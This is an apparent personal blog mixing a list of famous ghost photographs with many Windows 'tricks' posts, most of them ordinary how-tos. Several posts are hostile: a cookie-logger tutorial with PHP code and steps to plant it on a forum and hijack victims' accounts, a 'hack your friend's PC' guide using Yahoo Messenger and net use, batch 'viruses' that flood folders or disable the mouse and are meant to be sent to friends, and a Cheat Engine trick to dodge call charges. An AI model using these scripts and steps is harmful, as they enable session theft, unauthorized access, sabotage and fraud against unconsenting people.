Friday, 31 August 2012

Top 15 Most Famous Ghost Pictures Ever Taken


"The Brown Lady" of Raynham Hall
 
This photo was taken in 1936 at Raynham Hall in Norfolk, England. This portraint of "The Brown Lady" is arguably the most famous and well-regarded ghost photograph ever taken. The ghost is thought to be that of Lady Dorothy Townshend, wife of Charles Townshend, 2nd Viscount of Raynham, residents of Raynham Hall in Norfolk, England in the early 1700s. It was rumored that Dorothy, before her marriage to Charles, had been the mistress of Lord Wharton. Charles suspected Dorothy of infidelity. Although according to legal records she was buried in 1726, it was suspected that the funeral was a sham and that Charles had locked his wife away in a remote corner of the house until her death many years later.
 
 
Stair Case Ghost of National Museum, Greenwich, England
 
 
 
Rev. Ralph Hardy, a retired clergyman from White Rock, British Columbia, took this now famous photograph in 1966. He intended merely to photograph the beautiful staircase in the Queen's House section of the National Museum in Greenwich, England. Upon development, however the photo revealed a shrouded figure climbing the stairs, seeming to hold the railing with both hands. Experts, including some from Kodak, who examined the original negative concluded that it had not been tampered with. Its been said that unexplained figures have been seen on occasion in the vicinity of the staircase, and unexplained footsteps have also been heard.
 
 
Darn Backseat Drivers!
 
 
In 1959 Mable Chinnery went to the cemetery to visit the grave of her mother, as any devoted daughter is apt to do. She took some photos of the gravesite and then turned and took this picture of her husband sitting alone in the car's passenger seat. The film was developed and this came out: somebody sitting in the backseat wearing glasses, clear as day. Mrs. Chinnery swore that the "backseat driver" was none other than her own mother... whose gravesite she was standing next to when she took the picture! Hmmmm... a live husband and a deceased mother-in-law looking over his shoulder: there's a joke here, I just know it.

 
What Do You Want On Your Tombstone?
 
 
Back in 1996 Ike Clanton took this photo of a friend wearing western duds, in the middle of Tombstone's Boothill Graveyard. They swear that nobody else was in sight when they made this picture. Furthermore, some time later they tried to restage this picture with someone standing at the spot where the "mystery man" appears in the background. Ike Clanton says that it was impossible to take such a picture and not show the rear person's legs. Clanton said he wasn't so sure about Tombstone being haunted, but this photo made a believer out of him. There's so much ghostly activity going on in the famous town that Clanton's set up a special section of his website dedicated to Tombstone's population of yesteryear. Well worth checking out, if nothing else than for the sense of history that this excellent website conveys.
 
 
Come On Baby, Light My Fire
 

 
 
Of all the ghost photos I've seen (well, except for that one that I can't show at the present time), this one is hands-down the most eerie. Probably the most disturbing too. I didn't know about this one until a few months ago. Almost ten years ago, on November 19th, 1995, Wem Town Hall in Shropshire, England was engulfed in flames and burned to the ground. As firefighters tried to stave off the inferno a town resident, Tony O'Rahilly, took pictures from across the street using a telephoto lens on his camera. There, rather clearly in one of the photos, is what looks very much to be a small girl standing in a doorway, with the brightness of the flames behind her. No one ever remembered there being a small girl present on scene, much less in that close a proximity to the fire. The photo and the original negative were turned over to a photo expert who decided that the picture was 100% authentic: "The negative is a straightforward piece of black-and-white work and shows no sign of having been tampered with." Okay, so what's a girl ghost doing in such a big fire? Well in 1677 a fire destroyed many of Wem's wooden houses. The fire was said to have been caused by a 14-year old girl named Jane Churm, who had been careless with a candle. Churm died in the fire along with several others, and her ghost is said to still haunt the area. Whether there's such a thing as ghosts or not, it must be said: if this is just a trick, an illusion of smoke and fire that happened to be captured on film, it's a zillion-to-one coincidence that it just so happened to appear in the form of a girl who also died in a terrible fire at the same location. But hey, stranger things than that have happened in this world, right?
 
 
Ghost of Bachelor's Grove Cemetery, Chicago
 
This photo was taken during an investigation of Bachelor's Grove Cemetery near Chicago by the Ghost Research Society(GRS). On August 10, 1991 several memeber of the GRS were at the cemetery, a small abandoned garveyard on the edge of the Rubio Woods Forest Preserve, near the suburb of Midlothian, Illinois. Reputed to be one of the most haunted cemeteries in the U.S., Bachelor's Grove has been the site of well over 100 different reports of strange phenomena, including apparitions, unexplained sights and sounds, and even glowing balls of light. When developed, this image emerged: what looks like a lonely looking young woman dressed in white sitting on a tombstone. Parts of her body her partially tranparent and the style of the dress seems to be out of date.
 
"And the sea gave up the dead which were in it..."
 
 
I first saw this photo over twenty years ago. It was the first "ghost photo" I ever came across and it still wigs me out to look at it. In 1924 James Courtney and Michael Meehan, two crewmen of the tanker S.S. Watertown, were accidentally killed by gas fumes while cleaning a cargo tank. The crew of the Watertown - on its way to the Panama Canal from New York City ' buried the two sailors at sea off the Mexican coast. That was on December 4th. On December 5th the first mate reported that the faces of Courtney and Meehan were appearing in the water off the port side of the ship. Over the next several days every member of the crew witnessed the faces appear and disappear, including the ship's captain. When he reported this to his supervisors after docking in New Orleans it was suggested that he try to photograph the faces. Captain Keith Tracy bought a camera and the ship was soon underway again. Sure enough, the faces appeared, and Tracy took six pictures, then secured the camera in the ship's vault. The camera was not removed until it was taken to a commercial developer after docking in New York City. Five of the photos showed nothing unusual, but the sixth clearly showed what was said to be the faces of the two dead crewmen. No evidence of forgery or tampering of the film was ever discovered. The faces stopped appearing after a new crew was brought aboard the Watertown.

 
The Newby Church Monk
 
 
Reverend K.F. Lord took a picture of the altar at his church in North Yorkshire, England (why are the GOOD ghosts always found in England?) and this is what came out. The picture and the negative are said to have been thoroughly examined by photographic experts and they can't find any evidence that this was either a double exposure, or artificially altered. The "thing" is calculated to be standing nine feet tall, and no one's found any record of a monk that humongous ever being at Newby Church. Who is it? What is it? Trick of light or something else? Either way it's way too creepy to not mention on this list.
 
 
Ghost Child at Cemetery
 
 
A woman named Mrs. Andrews was visiting the grave of her daughter Joyce, who died at 17. Andrews saw nothing unusual when she took this photo of Joyce's gravemarker. When the film was developed, Mrs. Andrews was astonished to see the image of a small child sitting happily at her daughter's grave. The ghost child seem to be aware of Mrs. Andrews since he or she is looking directly into the camera. Is it possible a double exposure? Mrs. Andrews said there were no such children nearby when she took the photograh and moreover did not recognize the child at all. It was no one she would have taken photograh of. She remarked that she did not believe it was the ghost of her daughter as a child.

 
London's St. Botolph's Chruch Ghost
 
In 1982, photographer Chris Brackley took a photograph of the interior of London's St. Botolph's Chruch, but never expected what would appear on the film. High in the Church's loft, seen in the upper right hand corner of his photogarph, is a transparent form of what looks like a woman. According to Brackley, to his knowledge there were only three people in the church when this photograh was taken, and none of them were in that loft.

 
Church Minister Ghost
 
According to Brad Steiger's Real Ghosts, restless spirits and haunted places, where this photo was found, there was only one other photographer in the church beside the person who took this picture. Neither of them recalled seeing ghost or any flesh-and-blood person standing there who could account for this image. Because the figure is all in black, it has been theorized that the apparition could be that of the churuch minister.
 
 
Grandfather Ghost Standing Behind Grandmother
 
 
 
"The lady in the color photo is my granny," she says. "She lived on her own until age 94, when her mind started to weaken and had to be moved to an assisted living home for her own safety. At the end of the first week, there was a picnic for the residents and their families. My mother and sister attended. My sister took two pictures that day, and this is one of them. It was taken on Sunday, 8/17/97, and we think the man behind her is my grandpa who passed away on Sunday, 8/14/84. We did not notice the man in the picture until Christmas Day, 2000 (granny had since passed away), while browsing through some loose family photos at my parents' house. My sister thought it was such a nice picture of granny that she even made a copy for mom, but still, nobody noticed the man behind her for over three years! When I arrived at my parents' house that Christmas day, my sister handed me the picture and said, "Who do you think this man behind granny looks like?" It took a few seconds for it to sink in. I was absolutely speechless. The black and white photos show that it really looks like him."
I don't need what might be a ghost's photograph to attest to this truth: when you're in love with that one special someone, nothing will stop you from being with that person. But it's still pretty nice to get a tangible confirmation of that every once in awhile..
 
 
Railroad Crossing Ghost in San Antonio, Texas
 
 
 
A Strange legend surrounds a railroad crossing of San Antonio, Texas. The intersection of the roadway and railraod track, so the story goes, was the site of a tragic accidents in which several school-aged children were killed - but their ghosts linger at the spot and will push idled cars across the tracks, even though the path is uphill. Andy and Debi Chesney's daughter and some of her friends had recently been to the crossing to test the legend, and she took some photographs. Inexplicably, a strange, transparent figure turned up in one of the photos.
 
 
Freddy Jackson's Comeback
 
 
Freddy Jackson was a mechanic in the Royal Air Force in World War I. Freddy Jackson's squadron served onboard the H.M.S. Daedalus. Freddy Jackson was killed in 1919 when an airplane propeller hit him. Two days later when the squadron assembled for a group photo, Freddy Jackson faithfully showed up, grinning behind the ear of a fellow comrade. Guess nobody bothered to tell Freddy Jackson that he was dead. His face was widely recognized in this photo by members of the squadron.
 
 
His Favorite Chair
 
 
Remember how Archie Bunker liked his recliner so much that he never let anyone else sit in it? Well, ol' Archie doesn't have anything on Lord Combermere. After being ran over by a horse-drawn carriage he died in 1891. A photographer set up a camera with its shutter open for one hour in the manor's library while the entire staff was off at Lord Combermere's funeral, some four miles away. When the plate was developed, the startling image of what looks to be a man's head and arm sitting in the chair was immediately noticed. Many of the staff said that the image looked very much like the late lord, and it happened to be sitting in Combermere's favorite chair in the library.

Monday, 16 July 2012

Creat virus in ur fnds PC .



Now i will show how to create fake virus in your computer, this is a
good computer & notepad tricksto play with your friends
S, this is the initial step to become a hacker…
1–> open "notepad"
Type the commands given in given below :-
@echo off
C:
cls
echo hello
pause
echo im a virus
pause
echo hurray !! im become a hacker
pause
save the file as "MyTricksTime.bat" extension
for example if your file name is "virus" save it as "virus.bat"
Hurray !!! i had created a virus !!

Create bootable window 7 , vista, xp USB Flash/ Pen Drive


Create bootable window 7 , vista, xp USB Flash/ Pen DriveLets begin the guide without wasting time. Just make sure that you
have a pen drive with 4GB + capacity if you are making a bootable USB
flash drive.
Requirements to create bootable Windows USB:
# Windows 7 or Vista ISO
# Pen drive with 4GB+ (2 GB is sufficient for XP)
# 15 Minutes of free time
Procedure:
1. Insert your USB flash/pen drive to your system and backup all the
data from the USB as your USB drive will be formatted during the
process.
2. Now download software WinToFlash tool (free).(FROM google)
3. Run the tool, and browse to your Windows 7, Vista, or XP DVD files
(make sure that your USB drive letter is correct).
4. Click Create button to begin the bootable USB process. Wait for few
minutes to see the bootable USB.
5. Thats all!

How to remove VIRUS which do not show hidden folders


How to remove VIRUS which do not show hidden foldersHow To Remove the virus Which Makes do not show hidden folder Hey Friends
i have Got a New Trick For Computer
Some of us Found a Virus problem in Which, In the XP u could not
change the setting from "Do Not Show Hidden Folders" to "Show Hidden
Folders"
When u change to "Do Not Show Hidden Folders" to "Show Hidden Folders"
is Again turns into "Do Not Show"
So Friend! Here is the Solution
Follow the steps
1. Go To... Start>run
2. Enter "regedit"
3. In The Registry editor Follow The Steps
hkey_local_machine>software>microsoft
windows>currentversion>explorer>advanced>folder>hidden>showall
4. Now go to right side registry list checkedvalue double click 4 edit
5. chage vale data 1 close registry editor
Hey Dost
Now Ur Problem is Solved
enjoy friends :)

How To Partition Hard Drive Without Losing Data - Computer Tricks.


Before starting note that:
We can partition any drive, even a system drive
We can do it only in Windows XP, Windows 7 and Vista specifically
Follow these simple stepsGo to Start > Right click on My Computer and choose Manage.
Disk Management Window will Pop-up, it may take time to load it since
it fetches for all the hardware and system information in your PC.
After it's fully loaded, go to Storage> Disk management at the left
sidebar. This is where we'll have all the information about storage
devices that are in our PC currently connected and active.
At the right column all the storage media will be listed with their
basic information like File system type, and status.
Now choose the Volume that you want to partition. Right Click on it
and select Shrink Volume option from menu.
As soon as you click on the Shrink Volume option, system will search
for available space in your selected Disk Volume.
This will not take much longer than few seconds. After querying,
Shrink window will pop-up. This is where you'll have to specify the
Volume for next partition.
Look at the total size of available shrink space. Below it, you'll
have to Enter the space to shrink.you must make sure that the size is
not below the total size of space taken by files in that drive.
You can check the used space by right clicking on the drive you are
going to partition and choose Properties.
Click on Shrink button after specifying the size to shrink.
The shrink size is for the value for the partition where your old
files will be contained and remaining size will allocated for your
next partition.
But you'll still not able to access this new drive. You'll have to
format it and specify the drive letter to access them. To do so,
continue reading...... :))
Format the new drive
Right click on unallocated drive and choose New Simple Volume option.
New Simple Volume Wizard Window will popup.
Click on Next button to continue.
In next window, you'll have to specify the size for your new volume.
Set full size if you are satisfied with two partitions; else divide it
again for new partition.
Next choose any drive letter from the available list and click on Next button.
In next window, leave everything as default.
Click on Finish window to complete the wizard.

Fix windows xp corrupted file easily


Today i will show you how to easily fix Windows xp corrupted
files. Its work perfectly on windows xp and might works on windows 7
and windows vista also. Just follow below instruction to fix your
corrupted window.
REQUIREMENTS
PC Running Windows xp
Windows XP CD
HOW TO DO THAT ?
Place Windows XP cd in your CD/DVD drive.
Then Go to Start > Run
Type in sfc /scannow
Now your XP will run fine.

How to block unblock websites ?


Go to Start and then Run.
Type in this C:\WINDOWS\system32\drivers\etc
Now you will see file name Host open that in Notepad.
Below "127.0.0.1 localhost" add IP address of site to be blocked.
To unblock any site just reversed the process.

take control over ur Destop remotely , If u r any where in this globe to ur Pc.


In this tutorial, I am going to teach you how you can control your
computer's basic function using Microsoft Outlook and your Cell Phone
Network. For this tutorial I am demonstrating how a user can shutdown,
restart, hibernate their computer, just by sending an email from their
phone.
To make this happen, all you need is Microsoft Outlook installed on
the PC which you want to control from your cell phone
Now let's begin with the tutorial.First, you need the batch files to perform the Shutdown, Hibernate operation.
For example,
shutdown -r -t 10 -c "shutting down"
Copy this code and paste it in notepad, save it as shutdown.bat
Now open up Microsoft Outlook. I am assuming that you have already
configured it for your Email and I am not going to teach you about
setting mail in Microsoft Outlook. Now we will need to make it so that
Outlook checks your inbox about every minute.
You can do this by going to Tools>Options. Then click on Mail Setup
tab, and then, the Send/Receive button.
Make sure that the Schedule an automatic send/receive every… box is
checked, and set the number of minutes to 1 or anytime you may like.
Now you may close all of these dialog boxes.
Now go to Tools>Rules and Alerts. Click on E-mail Rules tab. In new
window select Check messages when they arrive and click Next.
Now in next page, check on, on this machine only and with specific
words in the subject.
After checking these two values, click on specific words underlined.
Search Text window will open, in the input field type the command that
shuts down the PC. You can use any commands. For prevention of
accidental execution I kept %shutdown% as a command. Click on Add
button after you are done and click on OK.
Now click on Next.
In the next window check mark on start application. In the lower
screen, click on application link.
Now you'll be welcomed to your familiar file open window. Load all
files. And select the batch file that you've created to shutdown your
PC.
If everything went well you'll see the screen similar to below:
Click on Next, again click on next (don't choose any things in this
step). And finally click on Finish button.
You'll have %shutdown% alert shown in the E-mail Rules tab.
Now, when you send a message from your phone to your e-mail address
with the Subject %shutdown%your computer will trigger shutdown.bat
file and instantly executes the command in that batch file finally
leading to shutdown the PC.
You can use any batch file to execute any command.
Hope you loved this tutorial.

hack any1's PC by yahoo messenger.


Hi! friends want to know how you can hack your friend computer through
Yahoo Messenger,than go ahead and read this post.You can Access your
friends computer without his information.Than follow the following
steps and don't forget to post your comments.Hack your friend's PC through Yahoo Messenger
1) Open Command Prompt. Have some one on yahoo messenger send you a
file; while the file is sending, in command prompt type -> netstat -an
press enter
2) It will show alll Active Connections on your computer, in there
under foreign ip for a number thats ends in 5050. this is the persons
ip adress who is sending you the file
3) Now type : net use: h \ (the person's ip adress)shareddocs push
enter wait for message to show up.
4) If it is successful you should get a message saying command prompt
was successful. If you get a error message than your attempt has
failed, probably because the person has security measures in place to
prevent hacking.
5) If you get the message that says command was successful, than go to
my computer. There you will see a file named "shareddocs on (the name
of your computer)" open this file
You are now connected to that person's computer.
Enjoy Guys! and don't forget to post your comments.

Free Calling Worldwide 100% Working

In this tutorial i am going to show you how to make free world wide
phone calls and talk as long as you likeLets start:
YOU WILL NEED JAVA INSTALLED IN YOUR PC
IF YOU NOT HAVE JAVA DOWNLOAD FROM (
http://www.java.com/en/download/manual.jsp )
THEN
First of all download FriendCaller from hear (
http://www.friendcaller.com/WebPhone/Client/FriendCaller.jnlp.)
After it is fully installed, open friend caller from desktop. Then
register. check email and verify account otherwise you will be not
able to call though you have free credits
Then go to your email and confirm your account and you will be
credited $ 0.10 for free calls. So you can only call for 10 seconds
for free but this what I made this tut so you can call free.
Now login with your account.
Then click on the phone icon.
Now comes the great part. Download a software called Cheat Engine from
here (http://www.ziddu.com/download/13655782/CheatEngine561_ehackworld.blogspot.com_.rar.html).
Run the software and click on "Open Process".
Then click on window list.
Select friend caller, and open it.
Now dial number in friend caller. [First test your own number] and click call.
It will start ringing...
Now in Cheat Engine, enable speed hack. Edit speed to 0.00 and click "Apply"

Now enjoy your call. The timer will freeze. You can talk as much as
you want. When you finish call, you will be only charged 0.02 but
after your balance is finished, make new account and enjoy.

Keyboard Dancing Led Light Trick


Today i will be showing you an interesting trick which will let
your keyboard led light to dance. Basicly we will be creating a
vbscript to make caps lock, num lock and scroll lock to perform this
trick. So lets get started. How to do that ?
1. Open Notepad and copy below codes into it.
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
2. Then save this file as led.vbs (.vbs is must)
3. Open your save file and see your keyboard led blinking like
disco lights.

How to disable blinking Led ?
1. First open Task Manager [ctrl+alt+del ]
2. Then Go to process tab.
3. Select wscript.exe
4. Click on End process.

How to creat 1000 folders in ur friends Destop. !!


Hello,here is a trick from which you can make 1000 or even more than
1000 folders in your Victims computer.Just Copy the below code in notepad and save it as 1000folders.bat and
File type as ALL FILES.
CODE:
@echo off
:topmd %random%
goto top
An now run it. It will start creating folders,just close the cmd
window and it'll stop.
TIP:Create a new folder and place this bat insode it and then run it.
Send this to friends via email and enjoy.

Make a virus that disable Mouse


I had previously posted on making different batch files like matrix
effect, opening no of websites with one click which were interesting
and completely harmless but today we will be making a batch virus
which is harmfull it will disable your mouse so think before trying it
on yourself.Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
Save this file as virus.bat
Done you just created your virus.

Advance matrix effects


Open Notepad and copy below code.@echo off
cls
title Enter The Matrix
color 02
set string=Wake up Neo...
set /a len=18
call :DisplayText
ping localhost -n 4 >nul
set string=The Matrix has you...
set /a len=25
call :DisplayText
ping localhost -n 4 >nul
set string=Follow the white rabbit.
set /a len=28
call :DisplayText
ping localhost -n 4 >nul
set string=Knock, knock, Neo...
set /a len=24
call :DisplayText
ping localhost -n 4 >nul

goto matrix

:DisplayText
set /a dispvar =1
set /a len +=1
:DisplayLoop
CALL SET str=%%string:~0,
%dispvar%%%
cls
echo %str%
ping localhost -n 1 >nul
set /a dispvar +=1
if '%dispvar%'=='%len%' goto
enddisplay
goto DisplayLoop
:enddisplay
exit /b
:matrix
setlocal enabledelayedexpansion
for /l %%A in (1,1,39) do (
set /a rnd=!random!%%5+1
if !rnd!==1 (
set /a rnd2=!random!%%26+1
set num=1
for %%A in (A B C D E F G H I J K L
M N O P Q R S T U V W X Y Z) do (
if !rnd2!==!num! (
set add=%%A
)
set /a num+=1
)
) else set /a add=!rnd!%%2
set var=!var! !add!
)
echo !var!
call :matrix
Save the file as matrix.bat (.bat is must)
Done enjoy !!

Make personal diary using notepad


Do you know that you can use your Notepad as a simple digital diary or
a personal Log-Book to keep record of your daily work instead of using
boring pen and book ? Well, if you dont know then follow the below
mentioned steps to make one for yourself !
First open up the Notepad.
Then Type in .LOG (in capital letters) and press enter.
Save it with any name and close it.
Open the file again.
When you open the file again you will see the current
date and time being inserted automatically after the .LOG line. This
will happen automatically every time you reopen the the notepad file.

How to change ur IP address.

In my previous post i had show you how to Grab someone ip address now
i will show you how to change ip address in less then a minute. For
now it will take 2 to 3 minutes but with some practice you can do this
within a minute.
Click on "Start" in the bottom left corner of the screen.
Click on "RUN"
Type in "command" and click OK
You should be now at MSDOS prompt Screen
Type "ipconfig /release" just like that, and press "enter"
Type "exit" and leave the prompt
Right-click on "Network Places" or "My Network Places" on your desktop.
Click on "properties"
Now you should be on a screen with something titled "Local Area
Connection", or something similar to that, and, if you have a network
hooked up, all of your other networks.
Right click on "Local Area Connection" and click "properties"
Double-click on the "Internet Protocol (TCP/IP)" from the list under
the "General" tab
Click on "Use the following IP address" under the "General" tab
Create an IP address (It doesn't matter what it is)
Press "Tab" and it should automatically fill in the "Subnet Mask"
section with default numbers.
Press the "Ok" button here
Hit the "Ok" button again
Now you should be back to the "Local Area Connection" screen.
Right-click back on "Local Area Connection" and go to properties again.
Go back to the "TCP/IP" settings
This time, select "Obtain an IP address automatically"
Click on "Ok"
Hit "Ok" again.
Now you have a New IP address.

100+ Run commands List

Accessibility Options : access.cpl
Add Hardware : hdwwiz.cpl
Add / Remove Programs : appwiz.cpl
Administrative Tools : control admintools
Automatic Updates : wuaucpl.cpl
Wizard file transfer Bluethooth : fsquirt
Calculator : calc
Certificate Manager : certmgr.msc
Character : charmap
Checking disk : chkdsk
Manager of the album (clipboard) : clipbrd
Command Prompt : cmd
Service components (DCOM) : dcomcnfg
Computer Management : compmgmt.msc
DDE active sharing : ddeshare
Device Manager : devmgmt.msc
DirectX Control Panel (if installed) : directx.cpl
DirectX Diagnostic Utility : dxdiag
Disk Cleanup : cleanmgr
System Information : dxdiag
Disk Defragmenter : dfrg.msc
Disk Management : diskmgmt.msc
Partition manager : diskpart
Display Properties : control desktop
Properties of the display (2) : desk.cpl
Properties display (tab "appearance") : control color
Dr. Watson : drwtsn32
Manager vérirficateur drivers : check
Event Viewer : Eventvwr.msc
Verification of signatures of files : sigverif
Findfast (if present) : findfast.cpl
Folder Options : control folders
Fonts (fonts) : control fonts
Fonts folder windows : fonts
Free Cell : freecell
Game Controllers : Joy.cpl
Group Policy (XP Pro) : gpedit.msc
Hearts (card game) : mshearts
IExpress (file generator. Cab) : IExpress
Indexing Service (if not disabled) : ciadv.msc
Internet Properties : inetcpl.cpl
IPConfig (display configuration) : ipconfig / all
IPConfig (displays the contents of the DNS cache) : ipconfig / displaydns
IPConfig (erases the contents of the DNS cache) : ipconfig / flushdns
IPConfig (IP configuration cancels maps) : ipconfig / release
IPConfig (renew IP configuration maps) : ipconfig / renew
Java Control Panel (if present) : jpicpl32.cpl
Java Control Panel (if present) : javaws
Keyboard Properties : control keyboard
Local Security Settings : secpol.msc
Local Users and Groups : lusrmgr.msc
Logout : logoff
Microsoft Chat : winchat
Minesweeper (game) : winmine
Properties of the mouse : control mouse
Properties of the mouse (2) : main.cpl
Network Connections : control NetConnect
Network Connections (2) : ncpa.cpl
Network configuration wizard : netsetup.cpl
Notepad : notepad
NView Desktop Manager (if installed) : nvtuicpl.cpl
Manager links : packager
Data Source Administrator ODBC : odbccp32.cpl
Screen Keyboard : OSK
AC3 Filter (if installed) : ac3filter.cpl
Password manager (if present) : Password.cpl
Monitor performance : perfmon.msc
Monitor performance (2) : perfmon
Dialing Properties (phone) : telephon.cpl
Power Options : powercfg.cpl
Printers and Faxes : control printers
Private Character Editor : eudcedit
Quicktime (if installed) : QuickTime.cpl
Regional and Language Options : intl.cpl
Editor of the registry : regedit
Remote desktop connection : mstsc
Removable Storage : ntmsmgr.msc
requests the operator to removable storage : ntmsoprq.msc
RSoP (traduction. ..) (XP Pro) : rsop.msc
Scanners and Cameras : sticpl.cpl
Scheduled Tasks : control schedtasks
Security Center : wscui.cpl
Console management services : services.msc
shared folders : fsmgmt.msc
Turn off windows : shutdown
Sounds and Audio Devices : mmsys.cpl
Spider (card game) : spider
Client Network Utility SQL server : cliconfg
System Configuration Editor : sysedit
System Configuration Utility : msconfig
System File Checker (SFC =) (Scan Now) : sfc / scannow
SFC (Scan next startup) : sfc / scanonce
SFC (Scan each démarraget) : sfc / scanboot
SFC (back to default settings) : sfc / revert
SFC (purge cache files) : sfc / purgecache
SFC (define size CAHC x) : sfc / cachesize = x
System Properties : sysdm.cpl
Task Manager : taskmgr
Telnet client : telnet
User Accounts : nusrmgr.cpl
Utility Manager (Magnifier, etc) : utilman
Windows firewall (XP SP2) : firewall.cpl
Microsoft Magnifier : magnify
Windows Management Infrastructure : wmimgmt.msc
Protection of the accounts database : syskey
Windows update : wupdmgr
Introducing Windows XP (if not erased) : tourstart
Wordpad : write
Date and Time Properties : timedate.cpl

Control your computer through SMS – Free of Cost

Control your computer through SMS – Free of Cost
The most convenient way to control the PC/System, while you are not at home is controlling it by SMS. Not only Home it can be Office also, in a way you can say controlling the computer wirelessly or remotely. This feature can be widely implemented in the country like India where SMS cost are very cheap.
Yes, you can also control your system through blue-tooth of mobile for this you can head on to my previous article here:  Control PC via Bluetooth of mobile.

Coming to the point, to control a PC through SMS, your system should be connected to internet. The service I am going to tell is Free of cost, it depends only on your service provider SMS charges. If you have FREE SMS packs of 10 digit mobile number then its totally FREE.
Well the thing we will need to have is twitter.com account, if you dont have one then you can make it on twitter.
Second thing we will need to have ” TweetMyPC ” software which again is a freeware and can be downloaded from here : Click to download directly. TweetMyPC basically runs on the PC all the time to monitor the Twitter updates for the account which you created earlier in background. So, this software should run always on PC. After installing TweetMyPC you will need to configure it correctly.
For that here we go :
> Run TweetMyPC by clicking on its icon from Desktop. It will start running in background, you can view it in system tray :
Control your computer through SMS – Free of Cost
> Right Click on the icon and select Edit Setting. Now a new window will appear asking you username and password of Twitter. Fill in the username and password of the Twitter account Correctly.
Control your computer through SMS – Free of Cost
> Save and close the window.
Now we are done with this stage of setup.
For updating Twitter status/controlling PC through SMS :
> For completing this step, we will head on to a FREE status update service which is available in India. It is here: http://www.smstweet.in/
Control your computer through SMS – Free of Cost
> Open the site, and click on ” Sign in with Twitter ” button. Allow the site to access Twitter. And enter you mobile number, through which you are going to update it. This is the one way of registering your mobile, or you can also Setup your mobile by Simply Sending SMS  ‘ TWEET REGISTER to 09220092200.
Now you are done. Start controlling your system wirelessly. But before that where are the commands which you will use to control your PC ?
List of Commands to Control PC:
>To shut down the PC you will need to send SMS asTWEET Shutdown ” to 09220092200 , without quotation.
Here are some more commands, but before sending those you will need to add TWEET word before each command.
Control your computer through SMS – Free of Cost

How To Hack any Account By CookieLogger | Create a CookieLogger and Hack any Account




 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.
What is a CookieLogger?
A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.
Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …
Step 1: Save the notepad file from the link below and Rename it as Fun.gif:
Download it.
Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:

$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>
Step 3: Create a new Notepad File and Save it as logfile.txt
Step 4: Upload this file to your server
cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif
If you don’t have any Website then you can use the following Website to get a Free Website which has php support :
http://0fees.net
Step 5: Go to the victim forum and insert this code in the signature or a post :
Download it.
Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9
Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.
Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.
Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.
Disclaimer: I don’t take Responsibility for what you do with this script, served for Educational purpose only
Enjoy !!

How To Create a Virtual WiFi Network on Windows 7

The new recent feature of Microsoft Windows 7 allows you to share your internet connection with several other Wireless enabled device users. This feature allows you to create your own hotspot network and help people around you to access your internet connection through by offering virtual router services from you own computer system.
There are different softwares launched on the internet which are designed for people to gain full advantage of this new windows feature. Many of them are free of charge but they come with a range of problemsrelated to connectivity issues, while others have a cost attached to them. Many people are not aware that there exists a very simple way through which one can easily create their own hotspot network and allows others to access your internet from one single source.
Virtual Wifi on Windows 7
Command Prompt is a built-in program found in all windows operating system. In windows 7, one can use this command program to set up their own Wi-Fi network (hotspot network) through their computer in a few simple steps.
Step 1: Open Command Prompt
For users of windows 7, first click on ‘start menu‘ icon. After this, type the term ‘cmd’ in the search box to find the program. CMD is a short form for the command prompt program. This program is also found in all programs folder of the start menu. However, to quickly access it, search box in start menu is a more viable option. Refer to this Screenshot.
Step 2: Establishing the Virtual Router Connection
After you open command prompt, a set of command options have to be typed in to establish the network. Remember! Command prompt does not recognize simple English language commands. Instead, proper computer terms have to be entered to establish the connection.
Here is the command prompt which should be used to initially set up the connection.
Netsh wlan set hostednetwork mode=allow ssid=MyNetwork key=MyKey
KeyUsuage=persistent
These command prompts represent formulating the following options which are a part of access the network connection.
1.       Netsh wlan set hostednetwork mode=allow
This option is commanding the system to activate the virtual Wi-Fi connection. This will enable the virtual wireless connection of the computer.
2.       SSID=MyNetwork
This option is commanding the system to broadcast the network name with MyNetwork. The phrase MyNetwork can be replaced with any other name which suits a certain person i.e. JamesNet, AlexHostedNetwork etc.
3.       Key=MyKey
Similar to the SSID command, this option enables you to define your own security key for the network. This key has to Alpha numeric.
4.       KeyUsage
This option should only be used in case one needs to use the same setting set over and over again. If you only plan on using this internet connection once, then you are not required to enter this option at all.
Step 3: Activating the Connection
Once the connection settings are established, there is separate command prompt required to activate the connection. Go back to the command box and enter the following:
netsh wlan start hostednetwork
After entering this command prompt, the virtual network will be activated.
